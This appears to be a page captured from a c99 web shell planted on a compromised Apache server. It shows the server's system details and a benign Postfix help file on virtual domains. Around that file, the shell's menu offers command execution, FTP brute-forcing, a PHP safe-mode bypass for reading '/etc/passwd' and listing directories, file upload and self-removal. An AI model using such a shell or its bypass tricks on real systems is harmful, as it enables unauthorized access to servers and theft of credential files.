!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/postfix/help/   drwxr-xr-x
Free 48.08 GB of 127.8 GB (37.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     virtual.html (2.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Virtual Domains
The optional virtual table specifies redirections for local and non-local recipients or domains. The redirections are used by the cleanup(8) daemon. The redirections are recursive.

The virtual redirection is applied only to the recipient envelope address, and does not affect message headers. Think Sendmail rule set S0, if you like. Use canonical mapping to rewrite header and envelope addresses in general.

Typical support for a virtual domain looks like the following:

  • virtual.domain mapped to... anything (right-hand content does not matter)
  • user1@virtual.domain mapped to... address1
  • user2@virtual.domain mapped to... address2, address3
With this, the SMTP server accepts mail for virtual.domain and rejects mail for unknown@virtual.domain as undeliverable.

The format of the virtual table is as follows, mappings being tried in the order as listed here:

  • user@domain mapped to... address, address, ...: Mail for user@domain is redirected to address. This form has the highest precedence.
  • user mapped to... address, address, ...: Mail for user@site is redirected to address when site is equal to $myorigin when site is listed in $mydestination, or when it is listed in $inet_interfaces. This functionality overlaps with functionality of the local alias database. The difference is that virtual mapping can be applied to non-local addresses.
  • @domain mapped to... address, address, ...: Mail for any user in domain is redirected to address. This form has the lowest precedence.
In all the above forms, when address has the form @otherdomain, the result is the same user in otherdomain. This works for the first address in the expansion only.

ADDRESS EXTENSION: When the search fails, and the address localpart contains the optional recipient delimiter (e.g., user+foo@domain), the search is repeated for the unextended address (e.g. user@domain), and the unmatched address extension is propagated to the result of expansion. The matching order is: user+foo@domain, user@domain, user+foo, user, and @domain.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0089 ]--